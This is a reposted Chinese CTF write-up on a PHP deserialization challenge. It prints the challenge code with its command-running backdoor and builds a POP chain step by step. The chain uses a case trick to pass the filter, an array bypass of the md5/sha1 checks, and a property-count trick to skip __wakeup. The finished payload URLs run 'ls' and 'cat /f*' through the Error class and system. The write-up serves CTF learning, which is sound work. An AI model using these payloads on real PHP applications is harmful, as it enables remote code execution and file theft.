我的编程空间,编程开发者的网络收藏夹
学习永远不晚

[网络安全/CTF] 记一次PHP序列化反序列化解题详析

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

[网络安全/CTF] 记一次PHP序列化反序列化解题详析

文章目录

姿势

题目给出以下代码:

error_reporting(0);function backdoor(){    $a = $_GET["a"];    $b = $_GET["b"];    $d = $_GET["d"];    $e = $_GET["e"];    $f = $_GET["f"];    $g = $_GET["g"];    $class = new $a($b);    $str1 = substr($class, $d, $e);    $str2 = substr($class, $f, $g);    $str1($str2);}class popko{    public $left;    public $right;    public function __call($method,$args)    {        if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {            echo "backdoor is here";            backdoor();        }    }    public function __wakeup()    {        $this->left = "";        $this->right = "";    }}class pipimi{    function __destruct()    {        echo $this->a->a();    }}$c = $_GET["c"];if ($c != null) {    if (strstr($_GET["c"], "popko") === false) {        unserialize($_GET["c"]);    } else {        echo ":)";    }} else {    highlight_file(__FILE__);} 

代码开门见山给出backdoor函数,而该函数在popko类的call方法中调用

故需要运行call方法

而call方法是在对象上下文中调用不可访问的方法时触发的

故需要调用不可访问的方法

而恰巧destruct方法中并不存在a对象和a函数

故需要运行destruct方法

而destruct方法在对象被销毁时触发

如何实现对象被销毁呢?

当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法

所以思路就是: 在pipimi类中构造一个对象,当pipimi中的destruct被执行后,调用popko类,从而运行call方法,进而调用backdoor函数

对于

 if (strstr($_GET["c"], "popko") === false) {        unserialize($_GET["c"]);    } else {        echo ":)";

这串代码的意思是:当我们传入的c不含有popko时 ,将对传入的参数c进行反序列化;否则将打印:)

所以我们要传入一个参数c,让它实现反序列化,却又含有popko

由于PHP是一种弱语言,函数名、方法名、类名不区分大小写,即class Object 与 class object 在解析时被当作一个变量

而strstr函数是区分大小写的

所以可以利用类名大小写不敏感但过滤函数大小写敏感的特性,构造popko链子(将popko改为Popko)

对于

 if (($this->left != $this->right) && (md5($this->left) === md5($this->right)) && (sha1($this->left) === sha1($this->right))) {            echo "backdoor is here";            backdoor();        }

要求left和right值不同,但md5加密所得的值相同,才能调用backdoor()函数

故使用数组传参绕过,即left[]=1&right[]=2

所以构造的链子为:
/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":2:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}

对象类名是 "pipimi",有一个属性 "a"。"a" 属性的值是另一个对象类型 "Popko"。"Popko" 对象有两个属性: "left" 和 "right"。"left" 属性是一个包含一个元素的数组,该元素的值为 1。"right" 属性是一个包含一个元素的数组,该元素的值为 2。

而执行unserialize()时,先会调用wakeup方法,如何绕过呢?

当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup方法的执行

所以将Popko的属性个数值增加为3即可:

/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}

回显如下:

在这里插入图片描述
成功进入后门

接着我们看看后门函数是怎么描述的:

function backdoor(){   $a = $_GET["a"];    $b = $_GET["b"];    $d = $_GET["d"];    $e = $_GET["e"];    $f = $_GET["f"];    $g = $_GET["g"];    $class = new $a($b);    $str1 = substr($class, $d, $e);    $str2 = substr($class, $f, $g);    $str1($str2);}

$class = new $a($b); 此语句new了新的类,但不可进行反序列化,这就遇到了需要反序列化但没有指定类的情况,所以只能找到PHP内置类(即原生类)来进行反序列化。

对于参数a,使用原生类中的error类即可

看看substr函数的语法:

image-20230212200041569

image-20230212200138282

故POC构造如下:

/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}&a=Error&b=systemls&d=7&e=6&f=13&g=2

回显如下:

在这里插入图片描述

使用命令抓取f开头的所有文件的内容即可:

/?c=O:6:"pipimi":1:{s:1:"a";O:5:"Popko":3:{s:4:"left";a:1:{i:0;i:1;}s:5:"right";a:1:{i:0;i:2;}}}&a=Error&b=systemcat /f*&d=7&e=6&f=13&g=7

其中,d、e、f、g的值需根据回显不断修改

得到flag:

在这里插入图片描述


总结

以上为一次PHP序列化反序列化解题详析记录,考察php代码审计、php强比较、序列化反序列化等知识点。

我是秋说,我们下次见。

来源地址:https://blog.csdn.net/2301_77485708/article/details/132475936

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

[网络安全/CTF] 记一次PHP序列化反序列化解题详析

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

网络安全渗透测试反序列化漏洞分析与复现的方法

这篇文章主要介绍了网络安全渗透测试反序列化漏洞分析与复现的方法的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇网络安全渗透测试反序列化漏洞分析与复现的方法文章都会有所收获,下面我们一起来看看吧。0x00 概述GE
2023-06-29

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录